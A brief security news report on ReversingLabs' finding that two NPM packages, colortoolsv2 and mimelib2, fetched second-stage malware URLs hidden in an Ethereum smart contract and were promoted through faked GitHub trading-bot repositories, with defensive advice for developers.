Researchers at ReversingLabs this week uncovered a new supply-chain technique: two malicious NPM packages that used Ethereum smart contracts to hide instructions pointing infected systems to download further malware.
The packages, colortoolsv2 and mimelib2, were uploaded to the Node Package Manager registry in July and initially looked like simple utilities. In practice, the code queried the Ethereum blockchain to fetch hidden URLs embedded in a smart contract; those URLs directed compromised hosts to pull a second-stage malware payload.
By placing commands inside a smart contract, attackers can mask network activity as normal blockchain traffic, which makes detection harder for conventional scanners that flag requests to cloud storage or gist links.
ReversingLabs tied the malicious packages to fake GitHub repositories posing as cryptocurrency trading bots. Those repos included fabricated commits, bogus accounts and inflated star counts to appear legitimate, increasing the chance that developers would install compromised code.
Using Ethereum smart contracts for this purpose is novel but builds on older tactics that used trusted hosting services like GitHub Gists, Google Drive or OneDrive to store malicious links. Here the blockchain becomes a covert communication channel.
Developers and security teams should treat this as a wake-up call: popular commits and maintainer activity can be faked. Best practices include reviewing source code before installing, pinning dependency versions, using lockfiles and automated supply-chain scanners, verifying repository contributors and running packages in isolated build environments.
The episode underscores accelerating threats to open-source crypto tooling and highlights how attackers adapt to blend into blockchain ecosystems. That raises particular risk for crypto projects and developers who rely on third-party packages for wallet tools, trading bots or infrastructure.
Source: ReversingLabs. Read the original coverage for full details.
